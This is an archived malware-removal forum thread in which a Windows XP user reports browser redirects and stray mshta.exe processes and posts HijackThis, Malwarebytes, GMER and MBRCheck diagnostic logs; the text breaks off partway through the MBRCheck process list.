
Solved mshta.exe "Funny Squirrel Show"

Discussion in 'Malware and Virus Removal Archive' started by Cosmic Jester, 2010/12/04.

  1. 2010/12/04
    Cosmic Jester

    Cosmic Jester Inactive Thread Starter

    Joined:
    2010/12/04
    Messages:
    22
    Likes Received:
    0
    [Resolved] mshta.exe "Funny Squirrel Show"

    Hi guys,
    This is my first post and I so look forward to having this issue resolved. I will try to explain in as much detail as possible.

    Last night, 4/12/2010 (Melbourne, Victoria time), I was plagued with malware, ever since I had my PC returned from a repair shop. The said malware did the following things:
    - An Error Report Message (Host Controller for Win32 has encountered a problem) is appearing, most likely due to malware. This would happen after a period of time.

    - My PC 'hangs' on to the Desktop during startup, but won't go any further. However, there is a chance it will start up normally. (Although I haven't encountered it since yesterday.)

    - I get redirected when I click on a link in my Google search. (Like above, I haven't encountered it since last night.)

    I scanned my PC with Malwarebytes and deleted a whole bunch of infections, and did a Process Explorer and McAfee Stinger scan during the night while I slept. Upon waking up in the morning, I noticed there were several processes named mshta.exe, with the http:// comment (by mousing over the executable): "Funny Squirrel Show" (as if it was from a website).

    ||||My Hijack This Log:||||

    Logfile of Trend Micro HijackThis v2.0.4
    Scan saved at 11:10:03 AM, on 5/12/2010
    Platform: Windows XP SP2 (WinNT 5.01.2600)
    MSIE: Internet Explorer v6.00 SP2 (6.00.2900.2180)
    Boot mode: Normal

    Running processes:
    C:\WINDOWS\System32\smss.exe
    C:\WINDOWS\system32\winlogon.exe
    C:\WINDOWS\system32\services.exe
    C:\WINDOWS\system32\lsass.exe
    C:\WINDOWS\system32\nvsvc32.exe
    C:\WINDOWS\system32\svchost.exe
    C:\WINDOWS\System32\svchost.exe
    C:\WINDOWS\System32\svchost.exe
    C:\WINDOWS\system32\spoolsv.exe
    C:\Program Files\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe
    C:\Program Files\Bonjour\mDNSResponder.exe
    C:\Program Files\Java\jre6\bin\jqs.exe
    C:\Program Files\Common Files\LightScribe\LSSrvc.exe
    C:\Program Files\Malwarebytes' Anti-Malware\mbamservice.exe
    c:\PROGRA~1\mcafee\SITEAD~1\mcsacore.exe
    C:\WINDOWS\system32\PnkBstrA.exe
    C:\WINDOWS\Explorer.EXE
    C:\Program Files\Windows Live\Device Manager\msgrdvmn.exe
    C:\Program Files\Malwarebytes' Anti-Malware\mbamgui.exe
    C:\Program Files\Logitech\SetPointP\SetPoint.exe
    C:\Program Files\iTunes\iTunesHelper.exe
    C:\Program Files\Microsoft LifeChat\LifeChat.exe
    C:\WINDOWS\system32\RUNDLL32.EXE
    C:\WINDOWS\RTHDCPL.EXE
    C:\Program Files\Common Files\Ahead\Lib\NMBgMonitor.exe
    C:\WINDOWS\system32\ctfmon.exe
    C:\Program Files\RocketDock\RocketDock.exe
    C:\Program Files\Common Files\LogiShrd\KHAL3\KHALMNPR.EXE
    C:\Program Files\Common Files\Ahead\Lib\NMIndexStoreSvr.exe
    C:\Program Files\Common Files\Ahead\Lib\NMIndexingService.exe
    C:\Program Files\iPod\bin\iPodService.exe
    C:\Program Files\Mozilla Firefox\firefox.exe
    C:\WINDOWS\System32\svchost.exe
    C:\windows-kb890830-v3.13.exe
    c:\090446d3ad7637842acf\mrtstub.exe
    C:\WINDOWS\system32\MRT.exe
    C:\WINDOWS\system32\wuauclt.exe
    C:\Program Files\Mozilla Firefox\plugin-container.exe
    C:\WINDOWS\System32\mshta.exe
    C:\WINDOWS\system32\NOTEPAD.EXE
    C:\Program Files\HiJackThis\HijackThis.exe

    R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = about:blank
    R1 - HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings,ProxyOverride = *.local
    R3 - URLSearchHook: McAfee SiteAdvisor Toolbar - {0EBBBE48-BAD4-4B4C-8E5A-516ABECAE064} - c:\PROGRA~1\mcafee\SITEAD~1\mcieplg.dll
    O2 - BHO: (no name) - {02478D38-C3F9-4efb-9B51-7695ECA05670} - (no file)
    O2 - BHO: AcroIEHelperStub - {18DF081C-E8AD-4283-A596-FA578C2EBDC3} - C:\Program Files\Common Files\Adobe\Acrobat\ActiveX\AcroIEHelperShim.dll
    O2 - BHO: (no name) - {5C255C8A-E604-49b4-9D64-90988571CECB} - (no file)
    O2 - BHO: Groove GFS Browser Helper - {72853161-30C5-4D22-B7F9-0BBC1D38A37E} - C:\Program Files\Microsoft Office\Office12\GrooveShellExtensions.dll
    O2 - BHO: Windows Live Sign-in Helper - {9030D464-4C02-4ABF-8ECC-5164760863C6} - C:\Program Files\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll
    O2 - BHO: SkypeIEPluginBHO - {AE805869-2E5C-4ED4-8F7B-F1F7851A4497} - C:\Program Files\Skype\Toolbars\Internet Explorer\skypeieplugin.dll
    O2 - BHO: McAfee SiteAdvisor BHO - {B164E929-A1B6-4A06-B104-2CD0E90A88FF} - c:\PROGRA~1\mcafee\SITEAD~1\mcieplg.dll
    O2 - BHO: Java(tm) Plug-In 2 SSV Helper - {DBC80044-A445-435b-BC74-9C25C1C588A9} - C:\Program Files\Java\jre6\bin\jp2ssv.dll
    O2 - BHO: JQSIEStartDetectorImpl - {E7E6F031-17CE-4C07-BC86-EABFE594F69C} - C:\Program Files\Java\jre6\lib\deploy\jqs\ie\jqs_plugin.dll
    O3 - Toolbar: McAfee SiteAdvisor Toolbar - {0EBBBE48-BAD4-4B4C-8E5A-516ABECAE064} - c:\PROGRA~1\mcafee\SITEAD~1\mcieplg.dll
    O4 - HKLM\..\Run: [AdobeCS4ServiceManager] "C:\Program Files\Common Files\Adobe\CS4ServiceManager\CS4ServiceManager.exe" -launchedbylogin
    O4 - HKLM\..\Run: [Adobe ARM] "C:\Program Files\Common Files\Adobe\ARM\1.0\AdobeARM.exe "
    O4 - HKLM\..\Run: [WindowsLivePhone] C:\Program Files\Windows Live\Device Manager\msgrdvmn.exe /AutoRun
    O4 - HKLM\..\Run: [Malwarebytes' Anti-Malware] "C:\Program Files\Malwarebytes' Anti-Malware\mbamgui.exe" /starttray
    O4 - HKLM\..\Run: [EvtMgr6] C:\Program Files\Logitech\SetPointP\SetPoint.exe /launchGaming
    O4 - HKLM\..\Run: [iTunesHelper] "C:\Program Files\iTunes\iTunesHelper.exe "
    O4 - HKLM\..\Run: [LifeChat] "C:\Program Files\Microsoft LifeChat\LifeChat.exe "
    O4 - HKLM\..\Run: [NvMediaCenter] RUNDLL32.EXE C:\WINDOWS\system32\NvMcTray.dll,NvTaskbarInit
    O4 - HKLM\..\Run: [NvCplDaemon] RUNDLL32.EXE C:\WINDOWS\system32\NvCpl.dll,NvStartup
    O4 - HKLM\..\Run: [nwiz] C:\Program Files\NVIDIA Corporation\nView\nwiz.exe /installquiet
    O4 - HKLM\..\Run: [RTHDCPL] RTHDCPL.EXE
    O4 - HKCU\..\Run: [BgMonitor_{79662E04-7C6C-4d9f-84C7-88D8A56B10AA}] "C:\Program Files\Common Files\Ahead\Lib\NMBgMonitor.exe "
    O4 - HKCU\..\Run: [ctfmon.exe] C:\WINDOWS\system32\ctfmon.exe
    O4 - HKCU\..\Run: [RocketDock] "C:\Program Files\RocketDock\RocketDock.exe "
    O4 - HKCU\..\Run: [WindowsLivePhone] "C:\Program Files\Windows Live\Device Manager\msgrdvmn.exe" /AutoRun
    O4 - HKUS\S-1-5-19\..\Run: [CTFMON.EXE] C:\WINDOWS\system32\CTFMON.EXE (User 'LOCAL SERVICE')
    O4 - HKUS\S-1-5-20\..\Run: [CTFMON.EXE] C:\WINDOWS\system32\CTFMON.EXE (User 'NETWORK SERVICE')
    O4 - HKUS\S-1-5-18\..\Run: [CTFMON.EXE] C:\WINDOWS\system32\CTFMON.EXE (User 'SYSTEM')
    O4 - HKUS\.DEFAULT\..\Run: [CTFMON.EXE] C:\WINDOWS\system32\CTFMON.EXE (User 'Default user')
    O8 - Extra context menu item: E&xport to Microsoft Excel - res://C:\PROGRA~1\MI1933~1\Office12\EXCEL.EXE/3000
    O9 - Extra button: Send to OneNote - {2670000A-7350-4f3c-8081-5663EE0C6C49} - C:\PROGRA~1\MI1933~1\Office12\ONBttnIE.dll
    O9 - Extra 'Tools' menuitem: S&end to OneNote - {2670000A-7350-4f3c-8081-5663EE0C6C49} - C:\PROGRA~1\MI1933~1\Office12\ONBttnIE.dll
    O9 - Extra button: Skype Plug-In - {898EA8C8-E7FF-479B-8935-AEC46303B9E5} - C:\Program Files\Skype\Toolbars\Internet Explorer\skypeieplugin.dll
    O9 - Extra 'Tools' menuitem: Skype Plug-In - {898EA8C8-E7FF-479B-8935-AEC46303B9E5} - C:\Program Files\Skype\Toolbars\Internet Explorer\skypeieplugin.dll
    O9 - Extra button: Research - {92780B25-18CC-41C8-B9BE-3C9C571A8263} - C:\PROGRA~1\MI1933~1\Office12\REFIEBAR.DLL
    O9 - Extra button: (no name) - {e2e2dd38-d088-4134-82b7-f2ba38496583} - C:\WINDOWS\Network Diagnostic\xpnetdiag.exe
    O9 - Extra 'Tools' menuitem: @xpsp3res.dll,-20001 - {e2e2dd38-d088-4134-82b7-f2ba38496583} - C:\WINDOWS\Network Diagnostic\xpnetdiag.exe
    O9 - Extra button: Messenger - {FB5F1910-F110-11d2-BB9E-00C04F795683} - C:\Program Files\Messenger\msmsgs.exe
    O9 - Extra 'Tools' menuitem: Windows Messenger - {FB5F1910-F110-11d2-BB9E-00C04F795683} - C:\Program Files\Messenger\msmsgs.exe
    O16 - DPF: {30528230-99f7-4bb4-88d8-fa1d4f56a2ab} - C:\Program Files\Yahoo!\Common\Yinsthelper.dll
    O18 - Protocol: dssrequest - {5513F07E-936B-4E52-9B00-067394E91CC5} - c:\PROGRA~1\mcafee\SITEAD~1\mcieplg.dll
    O18 - Protocol: grooveLocalGWS - {88FED34C-F0CA-4636-A375-3CB6248B04CD} - C:\Program Files\Microsoft Office\Office12\GrooveSystemServices.dll
    O18 - Protocol: sacore - {5513F07E-936B-4E52-9B00-067394E91CC5} - c:\PROGRA~1\mcafee\SITEAD~1\mcieplg.dll
    O18 - Protocol: skype-ie-addon-data - {91774881-D725-4E58-B298-07617B9B86A8} - C:\Program Files\Skype\Toolbars\Internet Explorer\skypeieplugin.dll
    O18 - Protocol: skype4com - {FFC8B962-9B40-4DFF-9458-1830C7DD7F5D} - C:\PROGRA~1\COMMON~1\Skype\SKYPE4~1.DLL
    O22 - SharedTaskScheduler: Browseui preloader - {438755C2-A8BA-11D1-B96B-00A0C90312E1} - C:\WINDOWS\system32\browseui.dll
    O22 - SharedTaskScheduler: Component Categories cache daemon - {8C7461EF-2B13-11d2-BE35-3078302C2030} - C:\WINDOWS\system32\browseui.dll
    O23 - Service: Apple Mobile Device - Apple Inc. - C:\Program Files\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe
    O23 - Service: Bonjour Service - Apple Inc. - C:\Program Files\Bonjour\mDNSResponder.exe
    O23 - Service: FLEXnet Licensing Service - Acresso Software Inc. - C:\Program Files\Common Files\Macrovision Shared\FLEXnet Publisher\FNPLicensingService.exe
    O23 - Service: InstallDriver Table Manager (IDriverT) - Macrovision Corporation - C:\Program Files\Common Files\InstallShield\Driver\11\Intel 32\IDriverT.exe
    O23 - Service: iPod Service - Apple Inc. - C:\Program Files\iPod\bin\iPodService.exe
    O23 - Service: Java Quick Starter (JavaQuickStarterService) - Sun Microsystems, Inc. - C:\Program Files\Java\jre6\bin\jqs.exe
    O23 - Service: Logitech Bluetooth Service (LBTServ) - Logitech, Inc. - C:\Program Files\Common Files\LogiShrd\Bluetooth\lbtserv.exe
    O23 - Service: LightScribeService Direct Disc Labeling Service (LightScribeService) - Hewlett-Packard Company - C:\Program Files\Common Files\LightScribe\LSSrvc.exe
    O23 - Service: MBAMService - Malwarebytes Corporation - C:\Program Files\Malwarebytes' Anti-Malware\mbamservice.exe
    O23 - Service: McAfee SiteAdvisor Service - McAfee, Inc. - c:\PROGRA~1\mcafee\SITEAD~1\mcsacore.exe
    O23 - Service: NMIndexingService - Nero AG - C:\Program Files\Common Files\Ahead\Lib\NMIndexingService.exe
    O23 - Service: NVIDIA Display Driver Service (nvsvc) - NVIDIA Corporation - C:\WINDOWS\system32\nvsvc32.exe
    O23 - Service: PnkBstrA - Unknown owner - C:\WINDOWS\system32\PnkBstrA.exe

    --
    End of file - 9122 bytes

    Can anyone please help me get rid of this mshta.exe, and possibly confirm whether or not my previous problems (the ones I stated in the list above) are still likely to occur due to them not being deleted?

    Thanks in advance, I look forward to having this problem resolved,

    - Jester
     
    Last edited: 2010/12/04
  2. 2010/12/04
    crunchie

    crunchie Inactive

    Joined:
    2010/01/12
    Messages:
    982
    Likes Received:
    5

  4. 2010/12/04
    Cosmic Jester

    Cosmic Jester Inactive Thread Starter

    Sure thing.
    Should I make each log as a separate reply?
    e.g. Malwarebytes log on Post #4
    GMER Log on Post #5
    etc. ?
     
    Last edited: 2010/12/04
  5. 2010/12/04
    crunchie

    crunchie Inactive

    Fit as many into one post as you can please.
     
  6. 2010/12/05
    Cosmic Jester

    Cosmic Jester Inactive Thread Starter

    Sorry!

    Sorry it took so long to make a reply; GMER took 5-6 hours to do a full scan of my PC.

    The Logs are in this order (to prevent confusion):
    MalwareBytes
    GMER
    MBR Check
    DDS (The one that is meant to be attached)
    DDS (The one that is NOT meant to be attached)


    Malwarebytes' Anti-Malware 1.50
    www.malwarebytes.org

    Database version: 5245

    Windows 5.1.2600 Service Pack 2
    Internet Explorer 6.0.2900.2180

    5/12/2010 2:54:58 PM
    mbam-log-2010-12-05 (14-54-58).txt

    Scan type: Quick scan
    Objects scanned: 141518
    Time elapsed: 4 minute(s), 12 second(s)

    Memory Processes Infected: 0
    Memory Modules Infected: 0
    Registry Keys Infected: 0
    Registry Values Infected: 0
    Registry Data Items Infected: 0
    Folders Infected: 0
    Files Infected: 0

    Memory Processes Infected:
    (No malicious items detected)

    Memory Modules Infected:
    (No malicious items detected)

    Registry Keys Infected:
    (No malicious items detected)

    Registry Values Infected:
    (No malicious items detected)

    Registry Data Items Infected:
    (No malicious items detected)

    Folders Infected:
    (No malicious items detected)

    Files Infected:
    (No malicious items detected)

    GMER 1.0.15.15530 - http://www.gmer.net
    Rootkit scan 2010-12-05 21:42:44
    Windows 5.1.2600 Service Pack 2 Harddisk0\DR0 -> \Device\Ide\IdeDeviceP2T0L0-f ST3250310AS rev.3.AAA
    Running: pxwbbt81.exe; Driver: C:\DOCUME~1\Marshall\LOCALS~1\Temp\awliqfob.sys


    ---- Kernel code sections - GMER 1.0.15 ----

    .text C:\WINDOWS\system32\DRIVERS\nv4_mini.sys section is writeable [0xB72E93A0, 0x5CC259, 0xE8000020]
    ? C:\WINDOWS\system32\Drivers\PROCEXP141.SYS The system cannot find the file specified. !

    ---- Registry - GMER 1.0.15 ----

    Reg HKLM\SYSTEM\CurrentControlSet\Services\sptd\Cfg\14919EA49A8F3B4AA3CF1058D9A64CEC
    Reg HKLM\SYSTEM\CurrentControlSet\Services\sptd\Cfg\14919EA49A8F3B4AA3CF1058D9A64CEC@u0 0x00 0x00 0x00 0x00 ...
    Reg HKLM\SYSTEM\CurrentControlSet\Services\sptd\Cfg\14919EA49A8F3B4AA3CF1058D9A64CEC@h0 0
    Reg HKLM\SYSTEM\CurrentControlSet\Services\sptd\Cfg\14919EA49A8F3B4AA3CF1058D9A64CEC@hdf12 0x15 0xE6 0x2A 0xA6 ...
    Reg HKLM\SYSTEM\CurrentControlSet\Services\sptd\Cfg\14919EA49A8F3B4AA3CF1058D9A64CEC@p0 F:\Program Files\DAEMON Tools Lite\
    Reg HKLM\SYSTEM\CurrentControlSet\Services\sptd\Cfg\14919EA49A8F3B4AA3CF1058D9A64CEC\00000001
    Reg HKLM\SYSTEM\CurrentControlSet\Services\sptd\Cfg\14919EA49A8F3B4AA3CF1058D9A64CEC\00000001@a0 0x20 0x01 0x00 0x00 ...
    Reg HKLM\SYSTEM\CurrentControlSet\Services\sptd\Cfg\14919EA49A8F3B4AA3CF1058D9A64CEC\00000001@hdf12 0x0C 0x78 0x24 0xBC ...
    Reg HKLM\SYSTEM\CurrentControlSet\Services\sptd\Cfg\14919EA49A8F3B4AA3CF1058D9A64CEC\00000001\gdq0
    Reg HKLM\SYSTEM\CurrentControlSet\Services\sptd\Cfg\14919EA49A8F3B4AA3CF1058D9A64CEC\00000001\gdq0@hdf12 0x7B 0xE7 0xD0 0xAE ...
    Reg HKLM\SYSTEM\ControlSet002\Services\sptd\Cfg\14919EA49A8F3B4AA3CF1058D9A64CEC (not active ControlSet)
    Reg HKLM\SYSTEM\ControlSet002\Services\sptd\Cfg\14919EA49A8F3B4AA3CF1058D9A64CEC@u0 0x00 0x00 0x00 0x00 ...
    Reg HKLM\SYSTEM\ControlSet002\Services\sptd\Cfg\14919EA49A8F3B4AA3CF1058D9A64CEC@h0 0
    Reg HKLM\SYSTEM\ControlSet002\Services\sptd\Cfg\14919EA49A8F3B4AA3CF1058D9A64CEC@hdf12 0x15 0xE6 0x2A 0xA6 ...
    Reg HKLM\SYSTEM\ControlSet002\Services\sptd\Cfg\14919EA49A8F3B4AA3CF1058D9A64CEC@p0 F:\Program Files\DAEMON Tools Lite\
    Reg HKLM\SYSTEM\ControlSet002\Services\sptd\Cfg\14919EA49A8F3B4AA3CF1058D9A64CEC\00000001 (not active ControlSet)
    Reg HKLM\SYSTEM\ControlSet002\Services\sptd\Cfg\14919EA49A8F3B4AA3CF1058D9A64CEC\00000001@a0 0x20 0x01 0x00 0x00 ...
    Reg HKLM\SYSTEM\ControlSet002\Services\sptd\Cfg\14919EA49A8F3B4AA3CF1058D9A64CEC\00000001@hdf12 0x0C 0x78 0x24 0xBC ...
    Reg HKLM\SYSTEM\ControlSet002\Services\sptd\Cfg\14919EA49A8F3B4AA3CF1058D9A64CEC\00000001\gdq0 (not active ControlSet)
    Reg HKLM\SYSTEM\ControlSet002\Services\sptd\Cfg\14919EA49A8F3B4AA3CF1058D9A64CEC\00000001\gdq0@hdf12 0x7B 0xE7 0xD0 0xAE ...
    Reg HKLM\SYSTEM\ControlSet003\Services\sptd\Cfg\14919EA49A8F3B4AA3CF1058D9A64CEC (not active ControlSet)
    Reg HKLM\SYSTEM\ControlSet003\Services\sptd\Cfg\14919EA49A8F3B4AA3CF1058D9A64CEC@u0 0x00 0x00 0x00 0x00 ...
    Reg HKLM\SYSTEM\ControlSet003\Services\sptd\Cfg\14919EA49A8F3B4AA3CF1058D9A64CEC@h0 0
    Reg HKLM\SYSTEM\ControlSet003\Services\sptd\Cfg\14919EA49A8F3B4AA3CF1058D9A64CEC@hdf12 0x15 0xE6 0x2A 0xA6 ...
    Reg HKLM\SYSTEM\ControlSet003\Services\sptd\Cfg\14919EA49A8F3B4AA3CF1058D9A64CEC@p0 F:\Program Files\DAEMON Tools Lite\
    Reg HKLM\SYSTEM\ControlSet003\Services\sptd\Cfg\14919EA49A8F3B4AA3CF1058D9A64CEC\00000001 (not active ControlSet)
    Reg HKLM\SYSTEM\ControlSet003\Services\sptd\Cfg\14919EA49A8F3B4AA3CF1058D9A64CEC\00000001@a0 0x20 0x01 0x00 0x00 ...
    Reg HKLM\SYSTEM\ControlSet003\Services\sptd\Cfg\14919EA49A8F3B4AA3CF1058D9A64CEC\00000001@hdf12 0x0C 0x78 0x24 0xBC ...
    Reg HKLM\SYSTEM\ControlSet003\Services\sptd\Cfg\14919EA49A8F3B4AA3CF1058D9A64CEC\00000001\gdq0 (not active ControlSet)
    Reg HKLM\SYSTEM\ControlSet003\Services\sptd\Cfg\14919EA49A8F3B4AA3CF1058D9A64CEC\00000001\gdq0@hdf12 0x7B 0xE7 0xD0 0xAE ...

    ---- EOF - GMER 1.0.15 ----

    MBRCheck, version 1.2.3
    (c) 2010, AD

    Command-line:
    Windows Version: Windows XP Professional
    Windows Information: Service Pack 2 (build 2600)
    Logical Drives Mask: 0x0000001c

    Kernel Drivers (total 127):
    0x804D7000 \WINDOWS\system32\ntkrnlpa.exe
    0x806E2000 \WINDOWS\system32\hal.dll
    0xB85A8000 \WINDOWS\system32\KDCOM.DLL
    0xB84B8000 \WINDOWS\system32\BOOTVID.dll
    0xB7F79000 ACPI.sys
    0xB85AA000 \WINDOWS\system32\DRIVERS\WMILIB.SYS
    0xB7F68000 pci.sys
    0xB80A8000 isapnp.sys
    0xB80B8000 ohci1394.sys
    0xB80C8000 \WINDOWS\system32\DRIVERS\1394BUS.SYS
    0xB7E5D000 \WINDOWS\System32\Drivers\SCSIPORT.SYS
    0xB8670000 pciide.sys
    0xB8328000 \WINDOWS\system32\DRIVERS\PCIIDEX.SYS
    0xB80D8000 MountMgr.sys
    0xB7E3E000 ftdisk.sys
    0xB85AC000 dmload.sys
    0xB7E18000 dmio.sys
    0xB8330000 PartMgr.sys
    0xB80E8000 VolSnap.sys
    0xB7E00000 atapi.sys
    0xB80F8000 disk.sys
    0xB8108000 \WINDOWS\system32\DRIVERS\CLASSPNP.SYS
    0xB7DE1000 fltMgr.sys
    0xB7DCF000 sr.sys
    0xB7DB8000 KSecDD.sys
    0xB7D2B000 Ntfs.sys
    0xB7CFE000 NDIS.sys
    0xB7CE3000 Mup.sys
    0xB81A8000 \SystemRoot\system32\DRIVERS\intelppm.sys
    0xB8470000 \SystemRoot\system32\DRIVERS\usbohci.sys
    0xB7C62000 \SystemRoot\system32\DRIVERS\USBPORT.SYS
    0xB8478000 \SystemRoot\system32\DRIVERS\usbehci.sys
    0xB81B8000 \SystemRoot\system32\DRIVERS\cdrom.sys
    0xB81C8000 \SystemRoot\system32\DRIVERS\redbook.sys
    0xB7C3F000 \SystemRoot\system32\DRIVERS\ks.sys
    0xB8480000 \SystemRoot\system32\DRIVERS\GEARAspiWDM.sys
    0xB7C17000 \SystemRoot\system32\DRIVERS\HDAudBus.sys
    0xB8488000 \SystemRoot\system32\DRIVERS\usbuhci.sys
    0xB81D8000 \SystemRoot\system32\DRIVERS\nic1394.sys
    0xB72E9000 \SystemRoot\system32\DRIVERS\nv4_mini.sys
    0xB72D5000 \SystemRoot\system32\DRIVERS\VIDEOPRT.SYS
    0xB81E8000 \SystemRoot\system32\DRIVERS\imapi.sys
    0xB81F8000 \SystemRoot\system32\DRIVERS\nvnetbus.sys
    0xB71FC000 \SystemRoot\system32\DRIVERS\NVNRM.SYS
    0xB7CB7000 \SystemRoot\system32\DRIVERS\wmiacpi.sys
    0xB877B000 \SystemRoot\system32\DRIVERS\audstub.sys
    0xB8208000 \SystemRoot\system32\DRIVERS\rasl2tp.sys
    0xB7CB3000 \SystemRoot\system32\DRIVERS\ndistapi.sys
    0xB71E5000 \SystemRoot\system32\DRIVERS\ndiswan.sys
    0xB8218000 \SystemRoot\system32\DRIVERS\raspppoe.sys
    0xB8228000 \SystemRoot\system32\DRIVERS\raspptp.sys
    0xB8490000 \SystemRoot\system32\DRIVERS\TDI.SYS
    0xB71D4000 \SystemRoot\system32\DRIVERS\psched.sys
    0xB8238000 \SystemRoot\system32\DRIVERS\msgpc.sys
    0xB8498000 \SystemRoot\system32\DRIVERS\ptilink.sys
    0xB84A0000 \SystemRoot\system32\DRIVERS\raspti.sys
    0xB71A3000 \SystemRoot\system32\DRIVERS\rdpdr.sys
    0xB8248000 \SystemRoot\system32\DRIVERS\termdd.sys
    0xB84A8000 \SystemRoot\system32\DRIVERS\kbdclass.sys
    0xB84B0000 \SystemRoot\system32\DRIVERS\mouclass.sys
    0xB85EA000 \SystemRoot\system32\DRIVERS\swenum.sys
    0xB7147000 \SystemRoot\system32\DRIVERS\update.sys
    0xB8540000 \SystemRoot\system32\DRIVERS\mssmbios.sys
    0xB8258000 \SystemRoot\system32\DRIVERS\NVENETFD.sys
    0xB8268000 \SystemRoot\System32\Drivers\NDProxy.SYS
    0xB8278000 \SystemRoot\system32\DRIVERS\usbhub.sys
    0xB85EC000 \SystemRoot\system32\DRIVERS\USBD.SYS
    0xB48BB000 \SystemRoot\system32\drivers\RtkHDAud.sys
    0xB4897000 \SystemRoot\system32\drivers\portcls.sys
    0xB82D8000 \SystemRoot\system32\drivers\drmk.sys
    0xB4880000 \SystemRoot\system32\drivers\nvhda32.sys
    0xB8604000 \SystemRoot\System32\Drivers\Fs_Rec.SYS
    0xB87F2000 \SystemRoot\System32\Drivers\Null.SYS
    0xB8606000 \SystemRoot\System32\Drivers\Beep.SYS
    0xB8390000 \SystemRoot\system32\DRIVERS\HIDPARSE.SYS
    0xB8398000 \SystemRoot\System32\drivers\vga.sys
    0xB8608000 \SystemRoot\System32\Drivers\mnmdd.SYS
    0xB860A000 \SystemRoot\System32\DRIVERS\RDPCDD.sys
    0xB83A0000 \SystemRoot\System32\Drivers\Msfs.SYS
    0xB83A8000 \SystemRoot\System32\Drivers\Npfs.SYS
    0xB717F000 \SystemRoot\system32\DRIVERS\rasacd.sys
    0xB4825000 \SystemRoot\system32\DRIVERS\ipsec.sys
    0xB47CD000 \SystemRoot\system32\DRIVERS\tcpip.sys
    0xB477D000 \SystemRoot\system32\DRIVERS\netbt.sys
    0xB475C000 \SystemRoot\system32\DRIVERS\ipnat.sys
    0xB7097000 \SystemRoot\System32\drivers\ws2ifsl.sys
    0xB473A000 \SystemRoot\System32\drivers\afd.sys
    0xB82F8000 \SystemRoot\system32\DRIVERS\wanarp.sys
    0xB8308000 \SystemRoot\system32\DRIVERS\netbios.sys
    0xB470E000 \SystemRoot\system32\DRIVERS\rdbss.sys
    0xB8318000 \SystemRoot\system32\DRIVERS\arp1394.sys
    0xB469F000 \SystemRoot\system32\DRIVERS\mrxsmb.sys
    0xB8138000 \SystemRoot\System32\Drivers\Fips.SYS
    0xB8158000 \SystemRoot\System32\Drivers\Cdfs.SYS
    0xB83B8000 \SystemRoot\system32\DRIVERS\usbccgp.sys
    0xB83C0000 \SystemRoot\System32\Drivers\LUsbFilt.Sys
    0xB8168000 \SystemRoot\System32\Drivers\WDFLDR.SYS
    0xB4584000 \SystemRoot\system32\DRIVERS\Wdf01000.sys
    0xB8568000 \SystemRoot\system32\DRIVERS\hidusb.sys
    0xB8178000 \SystemRoot\system32\DRIVERS\HIDCLASS.SYS
    0xB83C8000 \SystemRoot\system32\DRIVERS\LHidFilt.Sys
    0xB8570000 \SystemRoot\system32\DRIVERS\mouhid.sys
    0xB83D0000 \SystemRoot\system32\DRIVERS\LMouFilt.Sys
    0xB8574000 \SystemRoot\system32\DRIVERS\kbdhid.sys
    0xB8188000 \SystemRoot\system32\drivers\usbaudio.sys
    0xB4544000 \SystemRoot\System32\Drivers\dump_atapi.sys
    0xB8618000 \SystemRoot\System32\Drivers\dump_WMILIB.SYS
    0xBF800000 \SystemRoot\System32\win32k.sys
    0xB4868000 \SystemRoot\System32\drivers\Dxapi.sys
    0xB83E0000 \SystemRoot\System32\watchdog.sys
    0xBD000000 \SystemRoot\System32\drivers\dxg.sys
    0xB86D3000 \SystemRoot\System32\drivers\dxgthk.sys
    0xBD012000 \SystemRoot\System32\nv4_disp.dll
    0xBFFA0000 \SystemRoot\System32\ATMFD.DLL
    0xB39CE000 \??\C:\WINDOWS\system32\drivers\mbam.sys
    0xB38CA000 \SystemRoot\system32\DRIVERS\ndisuio.sys
    0xB35B1000 \SystemRoot\system32\DRIVERS\mrxdav.sys
    0xB86C9000 \SystemRoot\System32\Drivers\LBeepKE.sys
    0xB3524000 \SystemRoot\system32\drivers\wdmaud.sys
    0xB3926000 \SystemRoot\system32\drivers\sysaudio.sys
    0xB33E0000 \SystemRoot\system32\DRIVERS\srv.sys
    0xB2D57000 \SystemRoot\System32\Drivers\HTTP.sys
    0xB2C9F000 \SystemRoot\system32\DRIVERS\ipfltdrv.sys
    0xB8448000 \??\C:\WINDOWS\system32\Drivers\PROCEXP141.SYS
    0xB29F5000 \??\C:\DOCUME~1\Marshall\LOCALS~1\Temp\awliqfob.sys
    0xB288B000 \SystemRoot\system32\drivers\kmixer.sys
    0x7C900000 \WINDOWS\system32\ntdll.dll

    Processes (total 52):
    0 System Idle Process
    4 System
    636 C:\WINDOWS\system32\smss.exe
    684 csrss.exe
    708 C:\WINDOWS\system32\winlogon.exe
    756 C:\WINDOWS\system32\services.exe
    768 C:\WINDOWS\system32\lsass.exe
    932 C:\WINDOWS\system32\nvsvc32.exe
    992 C:\WINDOWS\system32\svchost.exe
    1040 svchost.exe
    1080 C:\WINDOWS\system32\svchost.exe
    1164 svchost.exe
    1236 svchost.exe
    1308 C:\WINDOWS\system32\svchost.exe
    1380 C:\WINDOWS\system32\spoolsv.exe
    1480 svchost.exe
    1516 C:\Program Files\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe
    1532 C:\Program Files\Bonjour\mDNSResponder.exe
    1668 C:\Program Files\Java\jre6\bin\jqs.exe
    1700 C:\Program Files\Common Files\LightScribe\LSSrvc.exe
    1752 C:\Program Files\Malwarebytes' Anti-Malware\mbamservice.exe
    1928 C:\PROGRA~1\McAfee\SITEAD~1\McSACore.exe
    1964 C:\WINDOWS\system32\PnkBstrA.exe
    2032 C:\WINDOWS\explorer.exe
    500 C:\Program Files\Windows Live\Device Manager\msgrdvmn.exe
    508 C:\Program Files\Malwarebytes' Anti-Malware\mbamgui.exe
    516 C:\Program Files\Logitech\SetPointP\SetPoint.exe
    544 C:\Program Files\iTunes\iTunesHelper.exe
    552 C:\Program Files\Microsoft LifeChat\LifeChat.exe
    608 C:\WINDOWS\system32\rundll32.exe
    652 C:\WINDOWS\RTHDCPL.EXE
    664 C:\Program Files\Common Files\Ahead\Lib\NMBgMonitor.exe
    688 C:\WINDOWS\system32\ctfmon.exe
    800 C:\Program Files\RocketDock\RocketDock.exe
    1100 C:\Program Files\Common Files\Ahead\Lib\NMIndexStoreSvr.exe
